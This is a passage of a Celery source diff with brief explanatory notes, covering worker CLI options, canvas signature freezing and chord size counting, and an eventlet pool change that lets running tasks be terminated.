- callback=lambda ctx, _, value: value or ctx.obj.app.conf.worker_concurrency,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.worker_concurrency,
cls=CeleryOption,
help_group="Pool Options",
help="Number of child processes processing the queue. "
@@ -178,6 +206,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'--task-events',
'--events',
is_flag=True,
+ default=None,
cls=CeleryOption,
help_group="Pool Options",
help="Send task-related events that can be captured by monitors"
@@ -231,15 +260,15 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
cls=CeleryOption,
help_group="Queue Options")
@click.option('--without-gossip',
- default=False,
+ is_flag=True,
cls=CeleryOption,
help_group="Features")
@click.option('--without-mingle',
- default=False,
+ is_flag=True,
cls=CeleryOption,
help_group="Features")
@click.option('--without-heartbeat',
- default=False,
+ is_flag=True,
cls=CeleryOption,
help_group="Features", )
@click.option('--heartbeat-interval',
@@ -259,13 +288,15 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
@click.option('-s',
'--schedule-filename',
'--schedule',
- callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename,
+ callback=lambda ctx, _,
+ value: value or ctx.obj.app.conf.beat_schedule_filename,
cls=CeleryOption,
help_group="Embedded Beat Options")
@click.option('--scheduler',
cls=CeleryOption,
help_group="Embedded Beat Options")
@click.pass_context
+@handle_preload_options
def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None,
loglevel=None, logfile=None, pidfile=None, statedb=None,
**kwargs):
@@ -280,52 +311,45 @@ def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None,
$ celery worker --autoscale=10,0
"""
- app = ctx.obj.app
- if ctx.args:
- try:
- app.config_from_cmdline(ctx.args, namespace='worker')
- except (KeyError, ValueError) as e:
- # TODO: Improve the error messages
- raise click.UsageError(
- "Unable to parse extra configuration from command line.\n"
- f"Reason: {e}", ctx=ctx)
- if kwargs.get('detach', False):
- params = ctx.params.copy()
- params.pop('detach')
- params.pop('logfile')
- params.pop('pidfile')
- params.pop('uid')
- params.pop('gid')
- umask = params.pop('umask')
- workdir = ctx.obj.workdir
- params.pop('hostname')
- executable = params.pop('executable')
- argv = ['-m', 'celery', 'worker']
- for arg, value in params.items():
- if isinstance(value, bool) and value:
- argv.append(f'--{arg}')
- else:
- if value is not None:
- argv.append(f'--{arg}')
- argv.append(str(value))
+ try:
+ app = ctx.obj.app
+ if ctx.args:
+ try:
+ app.config_from_cmdline(ctx.args, namespace='worker')
+ except (KeyError, ValueError) as e:
+ # TODO: Improve the error messages
+ raise click.UsageError(
+ "Unable to parse extra configuration from command line.\n"
+ f"Reason: {e}", ctx=ctx)
+ if kwargs.get('detach', False):
+ argv = ['-m', 'celery'] + sys.argv[1:]
+ if '--detach' in argv:
+ argv.remove('--detach')
+ if '-D' in argv:
+ argv.remove('-D')
+
return detach(sys.executable,
argv,
logfile=logfile,
pidfile=pidfile,
uid=uid, gid=gid,
- umask=umask,
- workdir=workdir,
+ umask=kwargs.get('umask', None),
+ workdir=kwargs.get('workdir', None),
app=app,
- executable=executable,
+ executable=kwargs.get('executable', None),
hostname=hostname)
- return
- maybe_drop_privileges(uid=uid, gid=gid)
- worker = app.Worker(
- hostname=hostname, pool_cls=pool_cls, loglevel=loglevel,
- logfile=logfile, # node format handled by celery.app.log.setup
- pidfile=node_format(pidfile, hostname),
- statedb=node_format(statedb, hostname),
- no_color=ctx.obj.no_color,
- **kwargs)
- worker.start()
- return worker.exitcode
+
+ maybe_drop_privileges(uid=uid, gid=gid)
+ worker = app.Worker(
+ hostname=hostname, pool_cls=pool_cls, loglevel=loglevel,
+ logfile=logfile, # node format handled by celery.app.log.setup
+ pidfile=node_format(pidfile, hostname),
+ statedb=node_format(statedb, hostname),
+ no_color=ctx.obj.no_color,
+ quiet=ctx.obj.quiet,
+ **kwargs)
+ worker.start()
+ return worker.exitcode
+ except SecurityError as e:
+ ctx.obj.error(e.args[0])
+ ctx.exit(1)
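The detach branch now re-executes the original command line minus the detach flags, instead of reassembling options from parsed parameters. A small sketch of the transformation with illustrative values:

argv_in = ['celery', '-A', 'proj', 'worker', '--detach', '-l', 'INFO']  # sys.argv
argv = ['-m', 'celery'] + argv_in[1:]
for flag in ('--detach', '-D'):
    if flag in argv:
        argv.remove(flag)
# -> ['-m', 'celery', '-A', 'proj', 'worker', '-l', 'INFO'],
# which detach() then hands to os.execv(sys.executable, ...).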
diff --git a/celery/canvas.py b/celery/canvas.py
index 7871f7b395d..8e9ac136f08 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -13,6 +13,7 @@
from functools import partial as _partial
from functools import reduce
from operator import itemgetter
+from types import GeneratorType
from kombu.utils.functional import fxrange, reprcall
from kombu.utils.objects import cached_property
@@ -25,7 +26,7 @@
from celery.utils.collections import ChainMap
from celery.utils.functional import _regen
from celery.utils.functional import chunks as _chunks
-from celery.utils.functional import (is_list, maybe_list, regen,
+from celery.utils.functional import (is_list, lookahead, maybe_list, regen,
seq_concat_item, seq_concat_seq)
from celery.utils.objects import getitem_property
from celery.utils.text import remove_repeating_from_task, truncate
@@ -56,12 +57,6 @@ def task_name_from(task):
return getattr(task, 'name', task)
-def _upgrade(fields, sig):
- """Used by custom signatures in .from_dict, to keep common fields."""
- sig.update(chord_size=fields.get('chord_size'))
- return sig
-
-
@abstract.CallableSignature.register
class Signature(dict):
"""Task Signature.
@@ -122,6 +117,9 @@ class Signature(dict):
TYPES = {}
_app = _type = None
+ # The following fields must not be changed during freezing/merging because
+ # to do so would disrupt completion of parent tasks
+ _IMMUTABLE_OPTIONS = {"group_id"}
@classmethod
def register_type(cls, name=None):
@@ -162,7 +160,6 @@ def __init__(self, task=None, args=None, kwargs=None, options=None,
options=dict(options or {}, **ex),
subtask_type=subtask_type,
immutable=immutable,
- chord_size=None,
)
def __call__(self, *partial_args, **partial_kwargs):
@@ -224,14 +221,22 @@ def apply_async(self, args=None, kwargs=None, route_name=None, **options):
def _merge(self, args=None, kwargs=None, options=None, force=False):
args = args if args else ()
kwargs = kwargs if kwargs else {}
- options = options if options else {}
+ if options is not None:
+ # We build a new options dictionary where values in `options`
+ # override values in `self.options` except for keys which are
+ # noted as being immutable (unrelated to signature immutability)
+ # implying that allowing their value to change would stall tasks
+ new_options = dict(self.options, **{
+ k: v for k, v in options.items()
+ if k not in self._IMMUTABLE_OPTIONS or k not in self.options
+ })
+ else:
+ new_options = self.options
if self.immutable and not force:
- return (self.args, self.kwargs,
- dict(self.options,
- **options) if options else self.options)
+ return (self.args, self.kwargs, new_options)
return (tuple(args) + tuple(self.args) if args else self.args,
dict(self.kwargs, **kwargs) if kwargs else self.kwargs,
- dict(self.options, **options) if options else self.options)
+ new_options)
def clone(self, args=None, kwargs=None, **opts):
"""Create a copy of this signature.
@@ -254,7 +259,6 @@ def clone(self, args=None, kwargs=None, **opts):
'kwargs': kwargs,
'options': deepcopy(opts),
'subtask_type': self.subtask_type,
- 'chord_size': self.chord_size,
'immutable': self.immutable},
app=self._app)
signature._type = self._type
@@ -285,8 +289,8 @@ def freeze(self, _id=None, group_id=None, chord=None,
if parent_id:
opts['parent_id'] = parent_id
if 'reply_to' not in opts:
- opts['reply_to'] = self.app.oid
- if group_id:
+ opts['reply_to'] = self.app.thread_oid
+ if group_id and "group_id" not in opts:
opts['group_id'] = group_id
if chord:
opts['chord'] = chord
@@ -481,7 +485,7 @@ def __repr__(self):
return self.reprcall()
def items(self):
- for k, v in dict.items(self):
+ for k, v in super().items():
yield k.decode() if isinstance(k, bytes) else k, v
@property
@@ -519,8 +523,6 @@ def _apply_async(self):
kwargs = getitem_property('kwargs', 'Keyword arguments to task.')
options = getitem_property('options', 'Task execution options.')
subtask_type = getitem_property('subtask_type', 'Type of signature')
- chord_size = getitem_property(
- 'chord_size', 'Size of chord (if applicable)')
immutable = getitem_property(
'immutable', 'Flag set if no longer accepts new arguments')
@@ -593,14 +595,13 @@ def from_dict(cls, d, app=None):
if isinstance(tasks, tuple): # aaaargh
tasks = d['kwargs']['tasks'] = list(tasks)
tasks = [maybe_signature(task, app=app) for task in tasks]
- return _upgrade(d, _chain(tasks, app=app, **d['options']))
+ return _chain(tasks, app=app, **d['options'])
def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
- Signature.__init__(
- self, 'celery.chain', (), {'tasks': tasks}, **options
- )
+ super().__init__('celery.chain', (), {'tasks': tasks}, **options
+ )
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
self._frozen = None
@@ -611,7 +612,7 @@ def __call__(self, *args, **kwargs):
def clone(self, *args, **kwargs):
to_signature = maybe_signature
- signature = Signature.clone(self, *args, **kwargs)
+ signature = super().clone(*args, **kwargs)
signature.kwargs['tasks'] = [
to_signature(sig, app=self._app, clone=True)
for sig in signature.kwargs['tasks']
@@ -640,7 +641,8 @@ def apply_async(self, args=None, kwargs=None, **options):
def run(self, args=None, kwargs=None, group_id=None, chord=None,
task_id=None, link=None, link_error=None, publisher=None,
- producer=None, root_id=None, parent_id=None, app=None, **options):
+ producer=None, root_id=None, parent_id=None, app=None,
+ group_index=None, **options):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
args = args if args else ()
@@ -652,19 +654,27 @@ def run(self, args=None, kwargs=None, group_id=None, chord=None,
args = (tuple(args) + tuple(self.args)
if args and not self.immutable else self.args)
- tasks, results = self.prepare_steps(
+ tasks, results_from_prepare = self.prepare_steps(
args, kwargs, self.tasks, root_id, parent_id, link_error, app,
- task_id, group_id, chord,
+ task_id, group_id, chord, group_index=group_index,
)
- if results:
+ if results_from_prepare:
if link:
tasks[0].extend_list_option('link', link)
first_task = tasks.pop()
options = _prepare_chain_from_options(options, tasks, use_link)
- first_task.apply_async(**options)
- return results[0]
+ result_from_apply = first_task.apply_async(**options)
+ # If we only have a single task, it may be important that we pass
+ # the real result object rather than the one obtained via freezing.
+ # e.g. For `GroupResult`s, we need to pass back the result object
+ # which will actually have its promise fulfilled by the subtasks,
+ # something that will never occur for the frozen result.
+ if not tasks:
+ return result_from_apply
+ else:
+ return results_from_prepare[0]
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None, group_index=None):
@@ -889,15 +899,12 @@ class _basemap(Signature):
@classmethod
def from_dict(cls, d, app=None):
- return _upgrade(
- d, cls(*cls._unpack_args(d['kwargs']), app=app, **d['options']),
- )
+ return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options'])
def __init__(self, task, it, **options):
- Signature.__init__(
- self, self._task_name, (),
- {'task': task, 'it': regen(it)}, immutable=True, **options
- )
+ super().__init__(self._task_name, (),
+ {'task': task, 'it': regen(it)}, immutable=True, **options
+ )
def apply_async(self, args=None, kwargs=None, **opts):
# need to evaluate generators
@@ -945,17 +952,13 @@ class chunks(Signature):
@classmethod
def from_dict(cls, d, app=None):
- return _upgrade(
- d, chunks(*cls._unpack_args(
- d['kwargs']), app=app, **d['options']),
- )
+ return chunks(*cls._unpack_args(d['kwargs']), app=app, **d['options'])
def __init__(self, task, it, n, **options):
- Signature.__init__(
- self, 'celery.chunks', (),
- {'task': task, 'it': regen(it), 'n': n},
- immutable=True, **options
- )
+ super().__init__('celery.chunks', (),
+ {'task': task, 'it': regen(it), 'n': n},
+ immutable=True, **options
+ )
def __call__(self, **options):
return self.apply_async(**options)
@@ -989,7 +992,10 @@ def _maybe_group(tasks, app):
elif isinstance(tasks, abstract.CallableSignature):
tasks = [tasks]
else:
- tasks = [signature(t, app=app) for t in tasks]
+ if isinstance(tasks, GeneratorType):
+ tasks = regen(signature(t, app=app) for t in tasks)
+ else:
+ tasks = [signature(t, app=app) for t in tasks]
return tasks
@@ -1028,9 +1034,15 @@ class group(Signature):
@classmethod
def from_dict(cls, d, app=None):
- return _upgrade(
- d, group(d['kwargs']['tasks'], app=app, **d['options']),
+ # We need to mutate the `kwargs` element in place to avoid confusing
+ # `freeze()` implementations which end up here and expect to be able to
+ # access elements from that dictionary later and refer to objects
+ # canonicalized here
+ orig_tasks = d["kwargs"]["tasks"]
+ d["kwargs"]["tasks"] = rebuilt_tasks = type(orig_tasks)(
+ maybe_signature(task, app=app) for task in orig_tasks
)
+ return group(rebuilt_tasks, app=app, **d['options'])
def __init__(self, *tasks, **options):
if len(tasks) == 1:
@@ -1041,9 +1053,8 @@ def __init__(self, *tasks, **options):
tasks = [tasks.clone()]
if not isinstance(tasks, _regen):
tasks = regen(tasks)
- Signature.__init__(
- self, 'celery.group', (), {'tasks': tasks}, **options
- )
+ super().__init__('celery.group', (), {'tasks': tasks}, **options
+ )
self.subtask_type = 'group'
def __call__(self, *partial_args, **options):
@@ -1100,7 +1111,7 @@ def apply(self, args=None, kwargs=None, **options):
options, group_id, root_id = self._freeze_gid(options)
tasks = self._prepared(self.tasks, [], group_id, root_id, app)
return app.GroupResult(group_id, [
- sig.apply(args=args, kwargs=kwargs, **options) for sig, _ in tasks
+ sig.apply(args=args, kwargs=kwargs, **options) for sig, _, _ in tasks
])
def set_immutable(self, immutable):
@@ -1108,19 +1119,25 @@ def set_immutable(self, immutable):
task.set_immutable(immutable)
def link(self, sig):
- # Simply link to first task
+ # Simply link to first task. Doing this is slightly misleading because
+ # the callback may be executed before all children in the group are
+ # completed, and even if children other than the first one fail.
+ #
+ # The callback signature is cloned and made immutable since the
+ # first task isn't actually capable of passing the return values of its
+ # siblings to the callback task.
sig = sig.clone().set(immutable=True)
return self.tasks[0].link(sig)
def link_error(self, sig):
- try:
- sig = sig.clone().set(immutable=True)
- except AttributeError:
- # See issue #5265. I don't use isinstance because current tests
- # pass a Mock object as argument.
- sig['immutable'] = True
- sig = Signature.from_dict(sig)
- return self.tasks[0].link_error(sig)
+ # Any child task might error so we need to ensure that they are all
+ # capable of calling the linked error signature. This opens the
+ # possibility that the task is called more than once but that's better
+ # than it not being called at all.
+ #
+ # We return a concretised tuple of the signatures actually applied to
+ # each child task signature, of which there might be none!
+ return tuple(child_task.link_error(sig) for child_task in self.tasks)
def _prepared(self, tasks, partial_args, group_id, root_id, app,
CallableSignature=abstract.CallableSignature,
@@ -1143,7 +1160,7 @@ def _prepared(self, tasks, partial_args, group_id, root_id, app,
else:
if partial_args and not task.immutable:
task.args = tuple(partial_args) + tuple(task.args)
- yield task, task.freeze(group_id=group_id, root_id=root_id)
+ yield task, task.freeze(group_id=group_id, root_id=root_id), group_id
def _apply_tasks(self, tasks, producer=None, app=None, p=None,
add_to_parent=None, chord=None,
@@ -1152,12 +1169,30 @@ def _apply_tasks(self, tasks, producer=None, app=None, p=None,
# XXX chord is also a class in outer scope.
app = app or self.app
with app.producer_or_acquire(producer) as producer:
- for sig, res in tasks:
+ # Iterate through tasks two at a time. If tasks is a generator,
+ # we are able to tell when we are at the end by checking if
+ # next_task is None. This enables us to set the chord size
+ # without burning through the entire generator. See #3021.
+ chord_size = 0
+ for task_index, (current_task, next_task) in enumerate(
+ lookahead(tasks)
+ ):
+ # We expect that each task must be part of the same group which
+ # seems sensible enough. If that's somehow not the case we'll
+ # end up messing up chord counts and there are all sorts of
+ # awful race conditions to think about. We'll hope it's not!
+ sig, res, group_id = current_task
+ chord_obj = chord if chord is not None else sig.options.get("chord")
+ # We need to check the chord size of each contributing task so
+ # that when we get to the final one, we can correctly set the
+ # size in the backend and the chord can be sensibly completed.
+ chord_size += _chord._descend(sig)
+ if chord_obj is not None and next_task is None:
+ # Per above, sanity check that we only saw one group
+ app.backend.set_chord_size(group_id, chord_size)
sig.apply_async(producer=producer, add_to_parent=False,
- chord=sig.options.get('chord') or chord,
- args=args, kwargs=kwargs,
+ chord=chord_obj, args=args, kwargs=kwargs,
**options)
-
# adding callback to result, such that it will gradually
# fulfill the barrier.
#
@@ -1177,10 +1212,10 @@ def _freeze_gid(self, options):
options.pop('task_id', uuid()))
return options, group_id, options.get('root_id')
- def freeze(self, _id=None, group_id=None, chord=None,
- root_id=None, parent_id=None, group_index=None):
+ def _freeze_group_tasks(self, _id=None, group_id=None, chord=None,
+ root_id=None, parent_id=None, group_index=None):
# pylint: disable=redefined-outer-name
- # XXX chord is also a class in outer scope.
+ # XXX chord is also a class in outer scope.
opts = self.options
try:
gid = opts['task_id']
@@ -1194,20 +1229,44 @@ def freeze(self, _id=None, group_id=None, chord=None,
opts['group_index'] = group_index
root_id = opts.setdefault('root_id', root_id)
parent_id = opts.setdefault('parent_id', parent_id)
- new_tasks = []
- # Need to unroll subgroups early so that chord gets the
- # right result instance for chord_unlock etc.
- results = list(self._freeze_unroll(
- new_tasks, group_id, chord, root_id, parent_id,
- ))
- if isinstance(self.tasks, MutableSequence):
- self.tasks[:] = new_tasks
+ if isinstance(self.tasks, _regen):
+ # We are draining from a generator here.
+ tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks))
+ results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id))
+ self.tasks = regen(x[0] for x in zip(tasks2, results))
else:
- self.tasks = new_tasks
- return self.app.GroupResult(gid, results)
+ new_tasks = []
+ # Need to unroll subgroups early so that chord gets the
+ # right result instance for chord_unlock etc.
+ results = list(self._freeze_unroll(
+ new_tasks, group_id, chord, root_id, parent_id,
+ ))
+ if isinstance(self.tasks, MutableSequence):
+ self.tasks[:] = new_tasks
+ else:
+ self.tasks = new_tasks
+ return gid, results
+
+ def freeze(self, _id=None, group_id=None, chord=None,
+ root_id=None, parent_id=None, group_index=None):
+ return self.app.GroupResult(*self._freeze_group_tasks(
+ _id=_id, group_id=group_id,
+ chord=chord, root_id=root_id, parent_id=parent_id, group_index=group_index
+ ))
_freeze = freeze
+ def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id):
+ yield from (task.freeze(group_id=group_id,
+ chord=chord,
+ root_id=root_id,
+ parent_id=parent_id,
+ group_index=group_index)
+ for group_index, task in enumerate(tasks))
+
+ def _unroll_tasks(self, tasks):
+ yield from (maybe_signature(task, app=self._app).clone() for task in tasks)
+
def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
# pylint: disable=redefined-outer-name
# XXX chord is also a class in outer scope.
@@ -1246,8 +1305,8 @@ def app(self):
return app if app is not None else current_app
-@Signature.register_type()
-class chord(Signature):
+@Signature.register_type(name="chord")
+class _chord(Signature):
r"""Barrier synchronization primitive.
A chord consists of a header and a body.
@@ -1278,7 +1337,7 @@ class chord(Signature):
def from_dict(cls, d, app=None):
options = d.copy()
args, options['kwargs'] = cls._unpack_args(**options['kwargs'])
- return _upgrade(d, cls(*args, app=app, **options))
+ return cls(*args, app=app, **options)
@staticmethod
def _unpack_args(header=None, body=None, **kwargs):
@@ -1289,12 +1348,11 @@ def _unpack_args(header=None, body=None, **kwargs):
def __init__(self, header, body=None, task='celery.chord',
args=None, kwargs=None, app=None, **options):
args = args if args else ()
- kwargs = kwargs if kwargs else {}
- Signature.__init__(
- self, task, args,
- {'kwargs': kwargs, 'header': _maybe_group(header, app),
- 'body': maybe_signature(body, app=app)}, app=app, **options
- )
+ kwargs = kwargs if kwargs else {'kwargs': {}}
+ super().__init__(task, args,
+ {**kwargs, 'header': _maybe_group(header, app),
+ 'body': maybe_signature(body, app=app)}, app=app, **options
+ )
self.subtask_type = 'chord'
def __call__(self, body=None, **options):
@@ -1364,21 +1422,37 @@ def apply(self, args=None, kwargs=None,
args=(tasks.apply(args, kwargs).get(propagate=propagate),),
)
- def _traverse_tasks(self, tasks, value=None):
- stack = deque(tasks)
- while stack:
- task = stack.popleft()
- if isinstance(task, group):
- stack.extend(task.tasks)
- elif isinstance(task, _chain) and isinstance(task.tasks[-1], group):
- stack.extend(task.tasks[-1].tasks)
+ @classmethod
+ def _descend(cls, sig_obj):
+ # Sometimes serialized signatures might make their way here
+ if not isinstance(sig_obj, Signature) and isinstance(sig_obj, dict):
+ sig_obj = Signature.from_dict(sig_obj)
+ if isinstance(sig_obj, group):
+ # Each task in a group counts toward this chord
+ subtasks = getattr(sig_obj.tasks, "tasks", sig_obj.tasks)
+ return sum(cls._descend(task) for task in subtasks)
+ elif isinstance(sig_obj, _chain):
+ # The last non-empty element in a chain counts toward this chord
+ for child_sig in sig_obj.tasks[-1::-1]:
+ child_size = cls._descend(child_sig)
+ if child_size > 0:
+ return child_size
else:
- yield task if value is None else value
+ # We have to just hope this chain is part of some encapsulating
+ # signature which is valid and can fire the chord body
+ return 0
+ elif isinstance(sig_obj, chord):
+ # The child chord's body counts toward this chord
+ return cls._descend(sig_obj.body)
+ elif isinstance(sig_obj, Signature):
+ # Each simple signature counts as 1 completion for this chord
+ return 1
+ # Any other types are assumed to be iterables of simple signatures
+ return len(sig_obj)
def __length_hint__(self):
- tasks = (self.tasks.tasks if isinstance(self.tasks, group)
- else self.tasks)
- return sum(self._traverse_tasks(tasks, 1))
+ tasks = getattr(self.tasks, "tasks", self.tasks)
+ return sum(self._descend(task) for task in tasks)
def run(self, header, body, partial_args, app=None, interval=None,
countdown=1, max_retries=None, eager=False,
@@ -1386,7 +1460,6 @@ def run(self, header, body, partial_args, app=None, interval=None,
app = app or self._get_app(body)
group_id = header.options.get('task_id') or uuid()
root_id = body.options.get('root_id')
- body.chord_size = self.__length_hint__()
options = dict(self.options, **options) if options else self.options
if options:
options.pop('task_id', None)
@@ -1400,11 +1473,11 @@ def run(self, header, body, partial_args, app=None, interval=None,
options.pop('chord', None)
options.pop('task_id', None)
- header_result = header.freeze(group_id=group_id, chord=body, root_id=root_id)
+ header_result_args = header._freeze_group_tasks(group_id=group_id, chord=body, root_id=root_id)
- if len(header_result) > 0:
+ if header.tasks:
app.backend.apply_chord(
- header_result,
+ header_result_args,
body,
interval=interval,
countdown=countdown,
@@ -1416,12 +1489,13 @@ def run(self, header, body, partial_args, app=None, interval=None,
# we execute the body manually here.
else:
body.delay([])
+ header_result = self.app.GroupResult(*header_result_args)
bodyres.parent = header_result
return bodyres
def clone(self, *args, **kwargs):
- signature = Signature.clone(self, *args, **kwargs)
+ signature = super().clone(*args, **kwargs)
# need to make copy of body
try:
signature.kwargs['body'] = maybe_signature(
@@ -1468,7 +1542,7 @@ def _get_app(self, body=None):
tasks = self.tasks.tasks # is a group
except AttributeError:
tasks = self.tasks
- if len(tasks):
+ if tasks:
app = tasks[0]._app
if app is None and body is not None:
app = body._app
@@ -1478,6 +1552,11 @@ def _get_app(self, body=None):
body = getitem_property('kwargs.body', 'Body task of chord.')
+# Add a back-compat alias for the previous `chord` class name which conflicts
+# with keyword arguments elsewhere in this file
+chord = _chord
+
+
def signature(varies, *args, **kwargs):
"""Create new signature.
@@ -1495,7 +1574,7 @@ def signature(varies, *args, **kwargs):
return Signature(varies, *args, **kwargs)
-subtask = signature # noqa: E305 XXX compat
+subtask = signature # XXX compat
def maybe_signature(d, app=None, clone=False):
@@ -1525,4 +1604,4 @@ def maybe_signature(d, app=None, clone=False):
return d
-maybe_subtask = maybe_signature # noqa: E305 XXX compat
+maybe_subtask = maybe_signature # XXX compat
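
A quick illustration of the revised completion counting: ``__length_hint__`` now recurses through nested groups, chains and chords via ``_descend``. A minimal sketch, assuming a throwaway app with two trivial tasks (the task names are illustrative only, not part of this change):

    from celery import Celery, chord, group

    app = Celery('sketch', broker='memory://')

    @app.task
    def add(x, y):
        return x + y

    @app.task
    def tsum(nums):
        return sum(nums)

    # Two tasks inside the nested group plus one plain signature should
    # count as three expected completions for the chord body.
    c = chord([group(add.s(1, 1), add.s(2, 2)), add.s(3, 3)], tsum.s())
    assert c.__length_hint__() == 3
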
diff --git a/celery/concurrency/__init__.py b/celery/concurrency/__init__.py
index c4c64764e3e..a326c79aff2 100644
--- a/celery/concurrency/__init__.py
+++ b/celery/concurrency/__init__.py
@@ -5,7 +5,7 @@
# too much (e.g., for eventlet patching)
from kombu.utils.imports import symbol_by_name
-__all__ = ('get_implementation',)
+__all__ = ('get_implementation', 'get_available_pool_names',)
ALIASES = {
'prefork': 'celery.concurrency.prefork:TaskPool',
@@ -26,3 +26,8 @@
def get_implementation(cls):
"""Return pool implementation by name."""
return symbol_by_name(cls, ALIASES)
+
+
+def get_available_pool_names():
+ """Return all available pool type names."""
+ return tuple(ALIASES.keys())
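
For reference, the new helper simply exposes the keys of the ``ALIASES`` mapping; a minimal usage sketch:

    from celery.concurrency import get_available_pool_names

    # e.g. ('prefork', 'eventlet', 'gevent', 'solo', ...), depending on version
    print(get_available_pool_names())
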
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index 4d2dd1138d2..d5d2bdb5124 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -16,12 +16,12 @@
import gc
import os
import select
-import sys
import time
from collections import Counter, deque, namedtuple
from io import BytesIO
from numbers import Integral
from pickle import HIGHEST_PROTOCOL
+from struct import pack, unpack, unpack_from
from time import sleep
from weakref import WeakValueDictionary, ref
@@ -35,7 +35,6 @@
from kombu.utils.functional import fxrange
from vine import promise
-from celery.platforms import pack, unpack, unpack_from
from celery.utils.functional import noop
from celery.utils.log import get_logger
from celery.worker import state as worker_state
@@ -47,21 +46,15 @@
from _billiard import read as __read__
readcanbuf = True
- # unpack_from supports memoryview in 2.7.6 and 3.3+
- if sys.version_info[0] == 2 and sys.version_info < (2, 7, 6):
-
- def unpack_from(fmt, view, _unpack_from=unpack_from): # noqa
- return _unpack_from(fmt, view.tobytes()) # <- memoryview
-
except ImportError: # pragma: no cover
- def __read__(fd, buf, size, read=os.read): # noqa
+ def __read__(fd, buf, size, read=os.read):
chunk = read(fd, size)
n = len(chunk)
if n != 0:
buf.write(chunk)
return n
- readcanbuf = False # noqa
+ readcanbuf = False
def unpack_from(fmt, iobuf, unpack=unpack): # noqa
return unpack(fmt, iobuf.getvalue()) # <-- BytesIO
@@ -84,6 +77,7 @@ def unpack_from(fmt, iobuf, unpack=unpack): # noqa
SCHED_STRATEGIES = {
None: SCHED_STRATEGY_FAIR,
+ 'default': SCHED_STRATEGY_FAIR,
'fast': SCHED_STRATEGY_FCFS,
'fcfs': SCHED_STRATEGY_FCFS,
'fair': SCHED_STRATEGY_FAIR,
@@ -984,10 +978,14 @@ def _write_ack(fd, ack, callback=None):
def flush(self):
if self._state == TERMINATE:
return
- # cancel all tasks that haven't been accepted so that NACK is sent.
- for job in self._cache.values():
+ # cancel all tasks that haven't been accepted so that NACK is sent
+ # if synack is enabled.
+ for job in tuple(self._cache.values()):
if not job._accepted:
- job._cancel()
+ if self.synack:
+ job._cancel()
+ else:
+ job.discard()
# clear the outgoing buffer as the tasks will be redelivered by
# the broker anyway.
@@ -1070,7 +1068,7 @@ def get_process_queues(self):
if owner is None)
def on_grow(self, n):
- """Grow the pool by ``n`` proceses."""
+ """Grow the pool by ``n`` processes."""
diff = max(self._processes - len(self._queues), 0)
if diff:
self._queues.update({
@@ -1250,7 +1248,7 @@ def on_partial_read(self, job, proc):
"""Called when a job was partially written to exited child."""
# worker terminated by signal:
# we cannot reuse the sockets again, because we don't know if
- # the process wrote/read anything frmo them, and if so we cannot
+ # the process wrote/read anything from them, and if so we cannot
# restore the message boundaries.
if not job._accepted:
# job was not acked, so find another worker to send it to.
diff --git a/celery/concurrency/eventlet.py b/celery/concurrency/eventlet.py
index bf794d47f16..f9c9da7f994 100644
--- a/celery/concurrency/eventlet.py
+++ b/celery/concurrency/eventlet.py
@@ -2,11 +2,12 @@
import sys
from time import monotonic
-from kombu.asynchronous import timer as _timer # noqa
+from greenlet import GreenletExit
+from kombu.asynchronous import timer as _timer
-from celery import signals # noqa
+from celery import signals
-from . import base # noqa
+from . import base
__all__ = ('TaskPool',)
@@ -93,6 +94,7 @@ class TaskPool(base.BasePool):
is_green = True
task_join_will_block = False
_pool = None
+ _pool_map = None
_quick_put = None
def __init__(self, *args, **kwargs):
@@ -107,8 +109,9 @@ def __init__(self, *args, **kwargs):
def on_start(self):
self._pool = self.Pool(self.limit)
+ self._pool_map = {}
signals.eventlet_pool_started.send(sender=self)
- self._quick_put = self._pool.spawn_n
+ self._quick_put = self._pool.spawn
self._quick_apply_sig = signals.eventlet_pool_apply.send
def on_stop(self):
@@ -119,12 +122,17 @@ def on_stop(self):
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, **_):
- self._quick_apply_sig(
- sender=self, target=target, args=args, kwargs=kwargs,
+ target = TaskPool._make_killable_target(target)
+ self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,)
+ greenlet = self._quick_put(
+ apply_target,
+ target, args,
+ kwargs,
+ callback,
+ accept_callback,
+ self.getpid
)
- self._quick_put(apply_target, target, args, kwargs,
- callback, accept_callback,
- self.getpid)
+ self._add_to_pool_map(id(greenlet), greenlet)
def grow(self, n=1):
limit = self.limit + n
@@ -136,6 +144,12 @@ def shrink(self, n=1):
self._pool.resize(limit)
self.limit = limit
+ def terminate_job(self, pid, signal=None):
+ if pid in self._pool_map.keys():
+ greenlet = self._pool_map[pid]
+ greenlet.kill()
+ greenlet.wait()
+
def _get_info(self):
info = super()._get_info()
info.update({
@@ -144,3 +158,24 @@ def _get_info(self):
'running-threads': self._pool.running(),
})
return info
+
+ @staticmethod
+ def _make_killable_target(target):
+ def killable_target(*args, **kwargs):
+ try:
+ return target(*args, **kwargs)
+ except GreenletExit:
+ return (False, None, None)
+ return killable_target
+
+ def _add_to_pool_map(self, pid, greenlet):
+ self._pool_map[pid] = greenlet
+ greenlet.link(
+ TaskPool._cleanup_after_job_finish,
+ self._pool_map,
+ pid
+ )
+
+ @staticmethod
+ def _cleanup_after_job_finish(greenlet, pool_map, pid):
+ del pool_map[pid]
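
The new pool-map bookkeeping is what makes ``terminate_job`` possible: each spawned greenlet is stored under its id and killed on request. A standalone sketch of the same pattern using eventlet directly (not the TaskPool code itself):

    import eventlet
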